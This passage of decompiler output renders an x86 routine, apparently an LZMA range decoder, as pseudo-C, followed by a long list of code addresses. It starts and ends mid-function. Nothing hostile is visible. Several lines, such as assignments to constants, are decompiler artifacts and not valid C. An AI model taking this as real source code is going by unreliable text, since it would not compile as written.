													__eflags =  *(__ebp - 0xc) - __ecx;
													if( *(__ebp - 0xc) >= __ecx) {
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
														__cx = __ax;
														_t170 = __edx + 1; // 0x1
														__ebx = _t170;
														__cx = __ax >> 5;
														__eflags = __eax;
														 *__esi = __ax;
													} else {
														 *(__ebp - 0x10) = __ecx;
														0x800 = 0x800 - __edi;
														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
														__ebx = __ebx + __ebx;
														 *__esi = __cx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0x10) >= 0x1000000) {
														continue;
													} else {
														goto L46;
													}
												}
												L54:
												_t173 = __ebp - 0x34;
												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
												__eflags =  *_t173;
												goto L55;
											case 0xf:
												L58:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xf;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t203 = __ebp - 0x70;
												 *_t203 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t203;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L60:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													L55:
													__al =  *(__ebp - 0x44);
													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
													goto L56;
												}
												L61:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t217 = __edx + 1; // 0x1
													__ebx = _t217;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L60;
												} else {
													goto L58;
												}
											case 0x10:
												L109:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x10;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t365 = __ebp - 0x70;
												 *_t365 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t365;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												goto L111;
											case 0x11:
												goto L69;
											case 0x12:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 0x58);
													 *(__ebp - 0x84) = 0x13;
													__esi =  *(__ebp - 0x58) + 2;
													while(1) {
														L132:
														 *(_t613 - 0x54) = _t606;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x4c);
												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												__eflags = __eax;
												__eax =  *(__ebp - 0x58) + __eax + 4;
												goto L130;
											case 0x13:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													_t469 = __ebp - 0x58;
													 *_t469 =  *(__ebp - 0x58) + 0x204;
													__eflags =  *_t469;
													 *(__ebp - 0x30) = 0x10;
													 *(__ebp - 0x40) = 8;
													L144:
													 *(__ebp - 0x7c) = 0x14;
													goto L145;
												}
												__eax =  *(__ebp - 0x4c);
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												 *(__ebp - 0x30) = 8;
												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
												L130:
												 *(__ebp - 0x58) = __eax;
												 *(__ebp - 0x40) = 3;
												goto L144;
											case 0x14:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
												__eax =  *(__ebp - 0x80);
												 *(_t613 - 0x88) = _t533;
												goto L1;
											case 0x15:
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xb;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
												goto L120;
											case 0x16:
												__eax =  *(__ebp - 0x30);
												__eflags = __eax - 4;
												if(__eax >= 4) {
													_push(3);
													_pop(__eax);
												}
												__ecx =  *(__ebp - 4);
												 *(__ebp - 0x40) = 6;
												__eax = __eax << 7;
												 *(__ebp - 0x7c) = 0x19;
												 *(__ebp - 0x58) = __eax;
												goto L145;
											case 0x17:
												L145:
												__eax =  *(__ebp - 0x40);
												 *(__ebp - 0x50) = 1;
												 *(__ebp - 0x48) =  *(__ebp - 0x40);
												goto L149;
											case 0x18:
												L146:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x18;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t484 = __ebp - 0x70;
												 *_t484 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t484;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L148:
												_t487 = __ebp - 0x48;
												 *_t487 =  *(__ebp - 0x48) - 1;
												__eflags =  *_t487;
												L149:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__ecx =  *(__ebp - 0x40);
													__ebx =  *(__ebp - 0x50);
													0 = 1;
													__eax = 1 << __cl;
													__ebx =  *(__ebp - 0x50) - (1 << __cl);
													__eax =  *(__ebp - 0x7c);
													 *(__ebp - 0x44) = __ebx;
													while(1) {
														 *(_t613 - 0x88) = _t533;
														goto L1;
													}
												}
												__eax =  *(__ebp - 0x50);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
												__eax =  *(__ebp - 0x58);
												__esi = __edx + __eax;
												 *(__ebp - 0x54) = __esi;
												__ax =  *__esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													__cx = __ax >> 5;
													__eax = __eax - __ecx;
													__edx = __edx + 1;
													__eflags = __edx;
													 *__esi = __ax;
													 *(__ebp - 0x50) = __edx;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L148;
												} else {
													goto L146;
												}
											case 0x19:
												__eflags = __ebx - 4;
												if(__ebx < 4) {
													 *(__ebp - 0x2c) = __ebx;
													L119:
													_t393 = __ebp - 0x2c;
													 *_t393 =  *(__ebp - 0x2c) + 1;
													__eflags =  *_t393;
													L120:
													__eax =  *(__ebp - 0x2c);
													__eflags = __eax;
													if(__eax == 0) {
														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
														goto L170;
													}
													__eflags = __eax -  *(__ebp - 0x60);
													if(__eax >  *(__ebp - 0x60)) {
														goto L171;
													}
													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
													__eax =  *(__ebp - 0x30);
													_t400 = __ebp - 0x60;
													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
													__eflags =  *_t400;
													goto L123;
												}
												__ecx = __ebx;
												__eax = __ebx;
												__ecx = __ebx >> 1;
												__eax = __ebx & 0x00000001;
												__ecx = (__ebx >> 1) - 1;
												__al = __al | 0x00000002;
												__eax = (__ebx & 0x00000001) << __cl;
												__eflags = __ebx - 0xe;
												 *(__ebp - 0x2c) = __eax;
												if(__ebx >= 0xe) {
													__ebx = 0;
													 *(__ebp - 0x48) = __ecx;
													L102:
													__eflags =  *(__ebp - 0x48);
													if( *(__ebp - 0x48) <= 0) {
														__eax = __eax + __ebx;
														 *(__ebp - 0x40) = 4;
														 *(__ebp - 0x2c) = __eax;
														__eax =  *(__ebp - 4);
														__eax =  *(__ebp - 4) + 0x644;
														__eflags = __eax;
														L108:
														__ebx = 0;
														 *(__ebp - 0x58) = __eax;
														 *(__ebp - 0x50) = 1;
														 *(__ebp - 0x44) = 0;
														 *(__ebp - 0x48) = 0;
														L112:
														__eax =  *(__ebp - 0x40);
														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
															_t391 = __ebp - 0x2c;
															 *_t391 =  *(__ebp - 0x2c) + __ebx;
															__eflags =  *_t391;
															goto L119;
														}
														__eax =  *(__ebp - 0x50);
														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
														__eax =  *(__ebp - 0x58);
														__esi = __edi + __eax;
														 *(__ebp - 0x54) = __esi;
														__ax =  *__esi;
														__ecx = __ax & 0x0000ffff;
														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
														__eflags =  *(__ebp - 0xc) - __edx;
														if( *(__ebp - 0xc) >= __edx) {
															__ecx = 0;
															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
															__ecx = 1;
															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
															__ebx = 1;
															__ecx =  *(__ebp - 0x48);
															__ebx = 1 << __cl;
															__ecx = 1 << __cl;
															__ebx =  *(__ebp - 0x44);
															__ebx =  *(__ebp - 0x44) | __ecx;
															__cx = __ax;
															__cx = __ax >> 5;
															__eax = __eax - __ecx;
															__edi = __edi + 1;
															__eflags = __edi;
															 *(__ebp - 0x44) = __ebx;
															 *__esi = __ax;
															 *(__ebp - 0x50) = __edi;
														} else {
															 *(__ebp - 0x10) = __edx;
															0x800 = 0x800 - __ecx;
															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
															 *__esi = __dx;
														}
														__eflags =  *(__ebp - 0x10) - 0x1000000;
														if( *(__ebp - 0x10) >= 0x1000000) {
															L111:
															_t368 = __ebp - 0x48;
															 *_t368 =  *(__ebp - 0x48) + 1;
															__eflags =  *_t368;
															goto L112;
														} else {
															goto L109;
														}
													}
													__ecx =  *(__ebp - 0xc);
													__ebx = __ebx + __ebx;
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
														__ecx =  *(__ebp - 0x10);
														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
														__ebx = __ebx | 0x00000001;
														__eflags = __ebx;
														 *(__ebp - 0x44) = __ebx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L101:
														_t338 = __ebp - 0x48;
														 *_t338 =  *(__ebp - 0x48) - 1;
														__eflags =  *_t338;
														goto L102;
													} else {
														goto L99;
													}
												}
												__edx =  *(__ebp - 4);
												__eax = __eax - __ebx;
												 *(__ebp - 0x40) = __ecx;
												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
												goto L108;
											case 0x1a:
												L56:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1a;
													goto L170;
												}
												__ecx =  *(__ebp - 0x68);
												__al =  *(__ebp - 0x5c);
												__edx =  *(__ebp - 8);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *( *(__ebp - 0x68)) = __al;
												__ecx =  *(__ebp - 0x14);
												 *(__ecx +  *(__ebp - 8)) = __al;
												__eax = __ecx + 1;
												__edx = 0;
												_t192 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t192;
												goto L80;
											case 0x1b:
												L76:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1b;
													goto L170;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t275 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t275;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												_t284 = __ebp - 0x64;
												 *_t284 =  *(__ebp - 0x64) - 1;
												__eflags =  *_t284;
												 *( *(__ebp - 0x68)) = __cl;
												L80:
												 *(__ebp - 0x14) = __edx;
												goto L81;
											case 0x1c:
												while(1) {
													L123:
													__eflags =  *(__ebp - 0x64);
													if( *(__ebp - 0x64) == 0) {
														break;
													}
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__edx =  *(__ebp - 8);
													__cl =  *(__eax + __edx);
													__eax =  *(__ebp - 0x14);
													 *(__ebp - 0x5c) = __cl;
													 *(__eax + __edx) = __cl;
													__eax = __eax + 1;
													__edx = 0;
													_t414 = __eax %  *(__ebp - 0x74);
													__eax = __eax /  *(__ebp - 0x74);
													__edx = _t414;
													__eax =  *(__ebp - 0x68);
													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
													__eflags =  *(__ebp - 0x30);
													 *( *(__ebp - 0x68)) = __cl;
													 *(__ebp - 0x14) = _t414;
													if( *(__ebp - 0x30) > 0) {
														continue;
													} else {
														L81:
														 *(__ebp - 0x88) = 2;
														goto L1;
													}
												}
												 *(__ebp - 0x88) = 0x1c;
												goto L170;
										}
									}
									L171:
									_t535 = _t534 | 0xffffffff;
									goto L172;
								}
							}
						}
					}
					goto L1;
				}
			}

0x00000000
0x00406fbb
0x00406fbb
0x00406fbf
0x00406fcc
0x00406fd6
0x00000000
0x00406fc1
0x00406fc1
0x00406ffc
0x00406fff
0x00407002
0x00407005
0x00407005
0x00407008
0x0040700f
0x00407014
0x00406ef5
0x00406ef8
0x0040726a
0x0040726a
0x0040726a
0x0040726d
0x0040726d
0x0040726d
0x00407273
0x00407279
0x0040727f
0x00407299
0x0040729c
0x004072a2
0x004072ad
0x004072af
0x00407281
0x00407281
0x00407290
0x00407294
0x00407294
0x004072b9
0x00000000
0x00000000
0x004072bb
0x004072bf
0x0040746e
0x00407484
0x0040748c
0x00407493
0x00407495
0x0040749c
0x004074a0
0x004074a0
0x004072cb
0x004072d2
0x004072da
0x004072dd
0x004072e0
0x004072e0
0x004072e6
0x004072e6
0x00406a82
0x00406a82
0x00406a82
0x00406a8b
0x00000000
0x00000000
0x00406a91
0x00000000
0x00406a9c
0x00000000
0x00000000
0x00406aa5
0x00406aa8
0x00406aab
0x00406aaf
0x00000000
0x00000000
0x00406ab5
0x00406ab8
0x00406aba
0x00406abb
0x00406abe
0x00406ac0
0x00406ac1
0x00406ac3
0x00406ac6
0x00406acb
0x00406ad0
0x00406ad9
0x00406aec
0x00406aef
0x00406afb
0x00406b23
0x00406b25
0x00406b33
0x00406b33
0x00406b37
0x00000000
0x00000000
0x00000000
0x00000000
0x00406b27
0x00406b27
0x00406b2a
0x00406b2b
0x00406b2b
0x00000000
0x00406b27
0x00406b01
0x00406b06
0x00406b06
0x00406b0f
0x00406b17
0x00406b1a
0x00000000
0x00406b20
0x00406b20
0x00000000
0x00406b20
0x00000000
0x00406b3d
0x00406b3d
0x00406b41
0x004073ed
0x00000000
0x004073ed
0x00406b4a
0x00406b5a
0x00406b5d
0x00406b60
0x00406b60
0x00406b60
0x00406b63
0x00406b67
0x00000000
0x00000000
0x00406b69
0x00406b6f
0x00406b99
0x00406b9f
0x00406ba6
0x00000000
0x00406ba6
0x00406b75
0x00406b78
0x00406b7d
0x00406b7d
0x00406b88
0x00406b90
0x00406b93
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406bd8
0x00406bde
0x00406be1
0x00406bee
0x00406bf6
0x0040726a
0x0040726a
0x00000000
0x00000000
0x00406bad
0x00406bad
0x00406bb1
0x004073fc
0x00000000
0x004073fc
0x00406bbd
0x00406bc8
0x00406bc8
0x00406bc8
0x00406bcb
0x00406bce
0x00406bd1
0x00406bd6
0x00000000
0x00000000
0x00000000
0x00000000
0x0040726d
0x0040726d
0x00407273
0x00407279
0x0040727f
0x00407299
0x0040729c
0x004072a2
0x004072ad
0x004072af
0x00407281
0x00407281
0x00407290
0x00407294
0x00407294
0x004072b9
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406bfe
0x00406c00
0x00406c03
0x00406c74
0x00406c77
0x00406c7a
0x00406c81
0x00406c8b
0x0040726a
0x0040726a
0x0040726a
0x00000000
0x0040726a
0x0040726a
0x00406c05
0x00406c09
0x00406c0c
0x00406c0e
0x00406c11
0x00406c14
0x00406c16
0x00406c19
0x00406c1b
0x00406c20
0x00406c23
0x00406c26
0x00406c2a
0x00406c31
0x00406c34
0x00406c3b
0x00406c3f
0x00406c47
0x00406c47
0x00406c47
0x00406c41
0x00406c41
0x00406c41
0x00406c36
0x00406c36
0x00406c36
0x00406c4b
0x00406c4e
0x00406c6c
0x00406c6e
0x00000000
0x00406c50
0x00406c50
0x00406c53
0x00406c56
0x00406c59
0x00406c5b
0x00406c5b
0x00406c5b
0x00406c5e
0x00406c61
0x00406c63
0x00406c64
0x00406c67
0x00000000
0x00406c67
0x00000000
0x00406e9d
0x00406ea1
0x00406ebf
0x00406ec2
0x00406ec9
0x00406ecc
0x00406ecf
0x00406ed2
0x00406ed5
0x00406ed8
0x00406eda
0x00406ee1
0x00406ee2
0x00406ee4
0x00406ee7
0x00406eea
0x00406eed
0x00406eed
0x00406ef2
0x00000000
0x00406ef2
0x00406ea3
0x00406ea6
0x00406ea9
0x00406eb3
0x0040726a
0x0040726a
0x0040726a
0x00000000
0x0040726a
0x00000000
0x00406f07
0x00406f0b
0x00406f2e
0x00406f31
0x00406f34
0x00406f3e
0x00406f0d
0x00406f0d
0x00406f10
0x00406f13
0x00406f16
0x00406f23
0x00406f26
0x00406f26
0x0040726a
0x0040726a
0x0040726a
0x00000000
0x0040726a
0x00000000
0x00406f4a
0x00406f4e
0x00000000
0x00000000
0x00406f54
0x00406f58
0x00000000
0x00000000
0x00406f5e
0x00406f60
0x00406f64
0x00406f64
0x00406f67
0x00406f6b
0x00000000
0x00000000
0x00000000
0x00000000
0x00406fe2
0x00406fe6
0x00406fed
0x00406ff0
0x00406ff3
0x00406fe8
0x00406fe8
0x00406fe8
0x00406ff6
0x00406ff9
0x00000000
0x00000000
0x004070a2
0x004070a2
0x004070a6
0x00407444
0x00000000
0x00407444
0x004070ac
0x004070af
0x004070b2
0x004070b6
0x004070b9
0x004070bf
0x004070c1
0x004070c1
0x004070c1
0x004070c4
0x004070c7
0x00000000
0x00000000
0x00406c97
0x00406c97
0x00406c9b
0x00407408
0x00000000
0x00407408
0x00406ca1
0x00406ca4
0x00406ca7
0x00406cab
0x00406cae
0x00406cb4
0x00406cb6
0x00406cb6
0x00406cb6
0x00406cb9
0x00406cbc
0x00406cbc
0x00406cbf
0x00406cc2
0x00000000
0x00000000
0x00406cc8
0x00406cce
0x00000000
0x00000000
0x00406cd4
0x00406cd4
0x00406cd8
0x00406cdb
0x00406cde
0x00406ce1
0x00406ce4
0x00406ce5
0x00406ce8
0x00406cea
0x00406cf0
0x00406cf3
0x00406cf6
0x00406cf9
0x00406cfc
0x00406cff
0x00406d02
0x00406d1e
0x00406d21
0x00406d24
0x00406d27
0x00406d2e
0x00406d32
0x00406d34
0x00406d38
0x00406d04
0x00406d04
0x00406d08
0x00406d10
0x00406d15
0x00406d17
0x00406d19
0x00406d19
0x00406d3b
0x00406d42
0x00406d45
0x00000000
0x00406d4b
0x00000000
0x00406d4b
0x00000000
0x00406d50
0x00406d50
0x00406d54
0x00407414
0x00000000
0x00407414
0x00406d5a
0x00406d5d
0x00406d60
0x00406d64
0x00406d67
0x00406d6d
0x00406d6f
0x00406d6f
0x00406d6f
0x00406d72
0x00406d75
0x00406d75
0x00406d75
0x00406d7b
0x00000000
0x00000000
0x00406d7d
0x00406d80
0x00406d83
0x00406d86
0x00406d89
0x00406d8c
0x00406d8f
0x00406d92
0x00406d95
0x00406d98
0x00406d9b
0x00406db3
0x00406db6
0x00406db9
0x00406dbc
0x00406dbc
0x00406dbf
0x00406dc3
0x00406dc5
0x00406d9d
0x00406d9d
0x00406da5
0x00406daa
0x00406dac
0x00406dae
0x00406dae
0x00406dc8
0x00406dcf
0x00406dd2
0x00000000
0x00406dd4
0x00000000
0x00406dd4
0x00406dd2
0x00406dd9
0x00406dd9
0x00406dd9
0x00406dd9
0x00000000
0x00000000
0x00406e14
0x00406e14
0x00406e18
0x00407420
0x00000000
0x00407420
0x00406e1e
0x00406e21
0x00406e24
0x00406e28
0x00406e2b
0x00406e31
0x00406e33
0x00406e33
0x00406e33
0x00406e36
0x00406e39
0x00406e39
0x00406e3f
0x00406ddd
0x00406ddd
0x00406de0
0x00000000
0x00406de0
0x00406e41
0x00406e41
0x00406e44
0x00406e47
0x00406e4a
0x00406e4d
0x00406e50
0x00406e53
0x00406e56
0x00406e59
0x00406e5c
0x00406e5f
0x00406e77
0x00406e7a
0x00406e7d
0x00406e80
0x00406e80
0x00406e83
0x00406e87
0x00406e89
0x00406e61
0x00406e61
0x00406e69
0x00406e6e
0x00406e70
0x00406e72
0x00406e72
0x00406e8c
0x00406e93
0x00406e96
0x00000000
0x00406e98
0x00000000
0x00406e98
0x00000000
0x00407125
0x00407125
0x00407129
0x00407450
0x00000000
0x00407450
0x0040712f
0x00407132
0x00407135
0x00407139
0x0040713c
0x00407142
0x00407144
0x00407144
0x00407144
0x00407147
0x00000000
0x00000000
0x00000000
0x00000000
0x00407234
0x00407238
0x0040725a
0x0040725d
0x00407267
0x0040726a
0x0040726a
0x0040726a
0x00000000
0x0040726a
0x0040726a
0x0040723a
0x0040723d
0x00407241
0x00407244
0x00407244
0x00407247
0x00000000
0x00000000
0x004072f1
0x004072f5
0x00407313
0x00407313
0x00407313
0x0040731a
0x00407321
0x00407328
0x00407328
0x00000000
0x00407328
0x004072f7
0x004072fa
0x004072fd
0x00407300
0x00407307
0x0040724b
0x0040724b
0x0040724e
0x00000000
0x00000000
0x004073e2
0x004073e5
0x004072e6
0x00000000
0x00000000
0x0040701c
0x0040701e
0x00407025
0x00407026
0x00407028
0x0040702b
0x00000000
0x00000000
0x00407033
0x00407036
0x00407039
0x0040703b
0x0040703d
0x0040703d
0x0040703e
0x00407041
0x00407048
0x0040704b
0x00407059
0x00000000
0x00000000
0x0040732f
0x0040732f
0x00407332
0x00407339
0x00000000
0x00000000
0x0040733e
0x0040733e
0x00407342
0x0040747a
0x00000000
0x0040747a
0x00407348
0x0040734b
0x0040734e
0x00407352
0x00407355
0x0040735b
0x0040735d
0x0040735d
0x0040735d
0x00407360
0x00407363
0x00407363
0x00407363
0x00407363
0x00407366
0x00407366
0x0040736a
0x004073ca
0x004073cd
0x004073d2
0x004073d3
0x004073d5
0x004073d7
0x004073da
0x004072e6
0x004072e6
0x00000000
0x004072ec
0x004072e6
0x0040736c
0x00407372
0x00407375
0x00407378
0x0040737b
0x0040737e
0x00407381
0x00407384
0x00407387
0x0040738a
0x0040738d
0x004073a6
0x004073a9
0x004073ac
0x004073af
0x004073b3
0x004073b5
0x004073b5
0x004073b6
0x004073b9
0x0040738f
0x0040738f
0x00407397
0x0040739c
0x0040739e
0x004073a1
0x004073a1
0x004073bc
0x004073c3
0x00000000
0x004073c5
0x00000000
0x004073c5
0x00000000
0x00407061
0x00407064
0x0040709a
0x004071ca
0x004071ca
0x004071ca
0x004071ca
0x004071cd
0x004071cd
0x004071d0
0x004071d2
0x0040745c
0x00000000
0x0040745c
0x004071d8
0x004071db
0x00000000
0x00000000
0x004071e1
0x004071e5
0x004071e8
0x004071e8
0x004071e8
0x00000000
0x004071e8
0x00407066
0x00407068
0x0040706a
0x0040706c
0x0040706f
0x00407070
0x00407072
0x00407074
0x00407077
0x0040707a
0x00407090
0x00407095
0x004070cd
0x004070cd
0x004070d1
0x004070fd
0x004070ff
0x00407106
0x00407109
0x0040710c
0x0040710c
0x00407111
0x00407111
0x00407113
0x00407116
0x0040711d
0x00407120
0x0040714d
0x0040714d
0x00407150
0x00407153
0x004071c7
0x004071c7
0x004071c7
0x00000000
0x004071c7
0x00407155
0x0040715b
0x0040715e
0x00407161
0x00407164
0x00407167
0x0040716a
0x0040716d
0x00407170
0x00407173
0x00407176
0x0040718f
0x00407191
0x00407194
0x00407195
0x00407198
0x0040719a
0x0040719d
0x0040719f
0x004071a1
0x004071a4
0x004071a6
0x004071a9
0x004071ad
0x004071af
0x004071af
0x004071b0
0x004071b3
0x004071b6
0x00407178
0x00407178
0x00407180
0x00407185
0x00407187
0x0040718a
0x0040718a
0x004071b9
0x004071c0
0x0040714a
0x0040714a
0x0040714a
0x0040714a
0x00000000
0x004071c2
0x00000000
0x004071c2
0x004071c0
0x004070d3
0x004070d6
0x004070d8
0x004070db
0x004070de
0x004070e1
0x004070e3
0x004070e6
0x004070e9
0x004070e9
0x004070ec
0x004070ec
0x004070ef
0x004070f6
0x004070ca
0x004070ca
0x004070ca
0x004070ca
0x00000000
0x004070f8
0x00000000
0x004070f8
0x004070f6
0x0040707c
0x0040707f
0x00407081
0x00407084
0x00000000
0x00000000
0x00406de3
0x00406de3
0x00406de7
0x0040742c
0x00000000
0x0040742c
0x00406ded
0x00406df0
0x00406df3
0x00406df6
0x00406df9
0x00406dfc
0x00406dff
0x00406e01
0x00406e04
0x00406e07
0x00406e0a
0x00406e0c
0x00406e0c
0x00406e0c
0x00000000
0x00000000
0x00406f6e
0x00406f6e
0x00406f72
0x00407438
0x00000000
0x00407438
0x00406f78
0x00406f7b
0x00406f7e
0x00406f81
0x00406f83
0x00406f83
0x00406f83
0x00406f86
0x00406f89
0x00406f8c
0x00406f8f
0x00406f92
0x00406f95
0x00406f96
0x00406f98
0x00406f98
0x00406f98
0x00406f9b
0x00406f9e
0x00406fa1
0x00406fa4
0x00406fa4
0x00406fa4
0x00406fa7
0x00406fa9
0x00406fa9
0x00000000
0x00000000
0x004071eb
0x004071eb
0x004071eb
0x004071ef
0x00000000
0x00000000
0x004071f5
0x004071f8
0x004071fb
0x004071fe
0x00407200
0x00407200
0x00407200
0x00407203
0x00407206
0x00407209
0x0040720c
0x0040720f
0x00407212
0x00407213
0x00407215
0x00407215
0x00407215
0x00407218
0x0040721b
0x0040721e
